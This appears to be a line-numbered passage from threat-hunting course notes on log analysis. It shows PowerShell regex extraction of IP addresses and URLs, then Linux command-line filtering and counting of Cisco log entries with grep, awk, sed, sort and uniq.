1114The select-string cmdlet contains various parameters as follows:
1115
11161) "-Path" which takes as input the full path to the input file
1117
11182) "-Pattern" which takes as input the regular expression used in the matching process
1119
11203) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
1121
1122Using ">" the results are written to the destination specified in the $output_file variable.
1123
1124Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1125
1126IP addresses
1127------------
1128For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
1129------------------------Type This------------------------------
1130$input_path = 'c:\ps\ip_addresses.txt'
1131$output_file = 'c:\ps\extracted_ip_addresses.txt'
1132$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
1133select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1134---------------------------------------------------------------
1135
1136
1137
1138URLs
1139----
1140For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1141You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1142------------------------Type This------------------------------
1143$input_path = 'c:\ps\URL_addresses.txt'
1144$output_file = 'c:\ps\extracted_URL_addresses.txt'
1145$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
1146select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1147---------------------------------------------------------------
1148
1149In addition to the examples above, many other types of strings can be extracted using this script.
1150All you need to do is switch the regular expression in the "$regex" variable!
1151In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1152
1153
1154
1155 ######################################
1156----------- ############### # Day 5: Wrapping up threat hunting ################ -----------
1157 #####################################
1158
1159##############################################
1160# Log Analysis with Linux command-line tools #
1161##############################################
1162The following command line executables are found in the Mac as well as most Linux Distributions.
1163
1164cat – prints the content of a file in the terminal window
1165grep – searches and filters based on patterns
1166awk – can sort each row into fields and display only what is needed
1167sed – performs find and replace functions
1168sort – arranges output in an order
1169uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1170
1171
1172##############
1173# Cisco Logs #
1174##############
1175
1176-----------------------------Type this-----------------------------------------
1177wget http://45.63.104.73/cisco.log
1178-------------------------------------------------------------------------------
1179
1180AWK Basics
1181----------
1182To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1183
1184-----------------------------Type this-----------------------------------------
1185cat cisco.log | awk '{print $5}' | tail -n 4
1186-------------------------------------------------------------------------------
1187
1188
1189
1190Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5â€, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c†to count the like entries, then using “sort -rn†to sort it in reverse order.
1191
1192-----------------------------Type this-----------------------------------------
1193cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
1194-------------------------------------------------------------------------------
1195
1196
1197
1198While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonicâ€.
1199
1200-----------------------------Type this-----------------------------------------
1201cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
1202-------------------------------------------------------------------------------
1203
1204
1205
1206
1207Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1208
1209-----------------------------Type this-----------------------------------------
1210cat cisco.log | grep %LINEPROTO-5-UPDOWN:
1211
1212cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
1213
1214cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
1215
1216cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1217--------------------------------------------------------------------------------